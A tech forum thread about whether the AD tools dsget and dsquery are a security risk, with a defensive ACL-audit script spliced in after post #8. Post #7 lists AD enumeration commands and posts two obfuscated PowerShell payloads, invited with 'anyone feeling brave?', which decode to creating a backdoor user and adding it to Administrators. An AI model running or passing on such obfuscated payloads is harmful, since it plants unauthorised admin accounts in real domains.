Mark Minasi's Tech Forum
Pieter

Senior Member
Posts: 239
#1
We got the advice from a security expert to remove some tools on our PCs, like dsget and dsquery.
What are your thoughts? Are those tools dangerous?

(We use dsget and dsquery in the logon script; that's why they are copied to each client.)


__________________
Pieter Demeulemeester
wobble_wobble

Associate Troublemaker Apprentice
Posts: 896
#2
I'd say PowerShell is a way bigger threat than DSGet/DSQuery.

Can't say I've seen them tagged as a security risk yet....


__________________
Have you tried turning it off and walking away? The next person can fix it!

New to the forum? Read this
wkasdo

Administrator
Posts: 237
#3
Crazy stuff. Make sure that you don't pay that guy.

Any hacker interested in reading AD will bring his own stuff anyway.

__________________
[MSFT]; Blog: https://blogs.technet.microsoft.com/389thoughts/
donoli

Senior Member
Posts: 598
#4
https://security.stackexchange.com/questions/158584/dsquery-leaking-personal-infomation

cj_berlin

Senior Member
Posts: 300
#5

You can get the same, or better, results with three lines of PowerShell, without any additional modules. Even with PS Core on Linux or Mac. .NET has a Directory Services client built in.

Permissions-wise, any authenticated user can read some info about user objects:

[image: authusers.png]


__________________
Evgenij Smirnov

My personal blog (German): http://www.it-pro-berlin.de/
My stuff on PSGallery: https://www.powershellgallery.com/profiles/it-pro-berlin.de/
donoli

Senior Member
Posts: 598
#6
So the mistake is in the permissions not in dsquery itself?
wobble_wobble

Associate Troublemaker Apprentice
Posts: 896
#7
Quote:
Originally Posted by donoli
So the mistake is in the permissions not in dsquery itself?


No, not quite.

If you have any sort of AD authenticated user, you can find out a lot of info using these commands.
net group /Domain "ICT VCENTER ADMINS"
net user /Domain "Wobble_Wobble"
dsquery user -name Wobble*
dsquery group -name Admin*
dsquery group dc=minasi,dc=com

dsquery user dc=minasi,dc=com | dsget user -samid -fn -ln -dn > names.csv

You need read permissions to be able to read whether you are allowed to do the "thing".
So your read permission is there; it doesn't mean you can do anything with it (yet).

So, thinking a bit out loud, why did Captain Security say it's a security risk.....

If, by using my allowed commands, I find that Joe Bloggs beside me has a superuser/administration account, then I could steal Joe's password off him and attack.
So therefore, giving me a tool that finds out about the superuser is a security risk.

But to help scare captain underpants......
Anyone feeling brave?

Code:

& ( $pshOmE[21]+$psHOme[30]+'X')(NEw-oBJECT sySteM.iO.CoMPresSION.DeflaTestrEaM( [Io.MEMOrYSTREAm][COnVERT]::FrOmbAse64STRing( 'bU49C8IwEP0rRyYdAoqjiwFFHSzFKo6S9g4NNEm5XCiCP94UOjo9Hu+zolGb/T0Rg66sJ3i4tu3p+YgzBJwk03UxB6ltSmNkXFzJoj7FJFC01FCXmRphF16gmrUf+k1td8W7YlRL0FPu9uYMXzgEW4rL5ly5NYiFHTnm4UK+ndbOSEGcfEAZ9C64JGwlclKgZ8u/lz8='), [IO.COmPResSiOn.COMPRESSIoNMODe]:😃eCOmpreSS ) | FOreaCh{NEw-oBJECT Io.StReAmREadeR( $_, [SYSTEm.texT.ENCODING]::asciI ) }| fOrEAch{ $_.READTOeND()}) 


Or
Code:

&( $eNv:COmSPeC[4,26,25]-Join'') (" $(SEt  'oFs' '') " + [StRing]('32h38:32p40d32j36@112;115d104e79e109d69h91d50d49j93;43e36d112@115j72@79@109@101}91@51@48p93p43@39d88d39p41!40j78h69:119d45p111p66@74;69;67:84d32h115;121p83;116}101h77}46;105:79h46;67!111!77;80h114;101:115@83p73;79e78!46@68j101@102p108h97d84p101h115@116;114;69:97:77j40j32p91}73@111;46h77}69;77}79!114@89e83:84@82p69;65:109!93e91e67@79d110e86!69@82}84}93p58:58h70p114j79;109h98!65@115j101}54;52d83h84p82!105h110@103!40e32d39@98}85!52d57d67;56j73:119@69}80!48:114p82h121j89j100@65@111j113p106h105;119!70}70}72;83e122j70:75;111:54h83}57@103;52}78h78p69j109;53@88j67d105:67h80@57p52d85e79}106@111j57:72:117:43j122!111j108:71d98p47d84}48}82@103;54p54!115:74}51p105!52p116@117}51@112e43!89d103}122@66:74:119;107:48}51:85p120e66@54}108j116}83p109j78j107}88}70!122:74}111;106p55e70:74;70e67!48e49}70}67p88!109e82}112p104@70d49p54p103;109:114@85e102!43j107}49@116}100}56@87d55e89d108j82h76!48;70j80:117@57@117}89}77;88}122@103;69j87p52}114p76d53j108p121h53d78h89;105@70d72p84@110e109e52j85!75d43!110}100h98j79h83h69@71e99}102}69:65p90p57e67;54j52}74@71d119!108:99;108!75j103@90}56:117!47h108p122}56;61@39j41:44:32@91}73h79:46:67:79}109!80@82j101h115d83h105;79;110}46:67d79p77e80j82:69@83}83j73j111j78e77!79p68}101j93:58h58h100:101p67j79}109:112h114:101}83p83j32e41e32p124d32!70j79p114j101p97!67e104@123d78@69}119d45:111:66j74;69e67}84!32d73d111e46;83p116e82}101;65h109d82h69e97p100@101j82e40!32;36e95p44d32:91h83@89p83;84}69h109}46j116@101d120!84!46}69h78}67:79!68e73}78h71e93h58!58d97:115:99;105:73j32p41@32!125!124h32@102}79h114h69}65p99e104}123p32p36j95d46h82d69j65d68d84j79e101h78j68:40}41@125;41j32'.spLit('😋!}d;j@he')| ForeaCH-ObJEcT {( [char] [InT] $_)}) +"$( set-ItEM 'variAbLe:OfS' ' ')") 


Which translates to
Code:

set scriptblock New-ADUser -Name Wibble_Wobble_Wonder -AccountPassword(Read-Host  -AsSecureString "S1mpl3Pa@ssw0rd") -PassThru | Enable-ADAccount;Add-ADGroupMember -Identity "Administrators" -Member Wibble_Wobble_Wonder



PS: the happy faces were not intentional; seems to be the interpreter seeing :: as a single : and a face, and p : as a face....


__________________
Have you tried turning it off and walking away? The next person can fix it!

New to the forum? Read this
wkasdo

Administrator
Posts: 237
#8
> I find that Joe Bloggs beside me has a superuser/ administration account, then I could steal Joe's password off him and attack.

Agreed, sort of: any tool allowing identity discovery is a security risk in that sense. But because any LDAP client can do the same I find the claim that dsquery is a "risk" highly exaggerated. Let's not forget that AD is readable by Authenticated Users, by design. The very goal is to share enough data for people to find each other.

The real way of preventing discovery of high-level admins is to hide them using proper permissions in AD, as donoli hinted. But that should not be your first concern. A much stronger approach is to apply a tiering model designed to prevent PtH and friends, combined with strong passwords and MFA for your admins.

__________________
[MSFT]; Blog: https://blogs.technet.microsoft.com/389thoughts/
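cj_berlin's and wkasdo's points taken together (the .NET Directory Services client is built in, and the fix for over-exposed admin accounts is AD permissions, not removing tools) suggest checking what those permissions actually grant. The following is an added example, not code from any poster in this thread; it assumes a domain-joined Windows host, PowerShell, and a placeholder DN for the account to inspect.

```powershell
# Added example, not from the thread: list ACEs on one AD object that grant
# read rights to "everyone-ish" principals, via the built-in .NET client.
# The DN is a placeholder; run on a domain-joined Windows host.
param(
    [string]$DistinguishedName = 'CN=Joe Bloggs,OU=Admins,DC=example,DC=com'
)

# Principals that amount to "any authenticated user"; Domain Users is matched
# by suffix because the NetBIOS domain prefix differs per forest.
$broadPrincipals = @(
    'NT AUTHORITY\Authenticated Users',
    'Everyone',
    'BUILTIN\Pre-Windows 2000 Compatible Access',
    'Domain Users'
)

$readRights = [System.DirectoryServices.ActiveDirectoryRights]::GenericRead -bor
              [System.DirectoryServices.ActiveDirectoryRights]::ReadProperty -bor
              [System.DirectoryServices.ActiveDirectoryRights]::ListChildren

$entry = [ADSI]"LDAP://$DistinguishedName"
# Explicit and inherited ACEs, with identities resolved to DOMAIN\Name form
$rules = $entry.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.NTAccount])

$findings = foreach ($rule in $rules) {
    if ($rule.AccessControlType -ne 'Allow') { continue }
    $who = $rule.IdentityReference.Value
    $broad = $broadPrincipals | Where-Object { $who -eq $_ -or $who -like ('*\' + $_) }
    if (-not $broad) { continue }
    if ([int]($rule.ActiveDirectoryRights -band $readRights) -eq 0) { continue }
    [pscustomobject]@{
        Principal  = $who
        Rights     = $rule.ActiveDirectoryRights
        Inherited  = $rule.IsInherited
        # attribute or property-set GUID; all zeros means the whole object
        ObjectType = $rule.ObjectType
    }
}

if ($findings) {
    "Broad read ACEs on ${DistinguishedName}:"
    $findings | Format-Table -AutoSize
} else {
    "No broad read ACEs on $DistinguishedName."
}
```

On a default domain most of what it reports is inherited from the domain root (Pre-Windows 2000 Compatible Access, Authenticated Users), which is the "readable by design" behaviour wkasdo describes; the same script run against a protected admin account shows whether tightened or AdminSDHolder-derived ACLs actually changed that.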
Pieter

Senior Member
Posts: 239
#9
Thanks everybody for the replies.

I made the following comparison:
- a webserver can be viewed with IE, Chrome, Firefox, etc. Is the communication with the webserver less secure if I browse it with Lynx (CLI browser)?
- a file share can be viewed with Explorer or one of the many alternatives. Is the data on that share less safe if I look at it with 'dir' and 'type'?
- a SQL database can be queried with an application or the SQL Manager. Is it less safe if I use sqlcmd.exe?

I don't think so.

__________________
Pieter Demeulemeester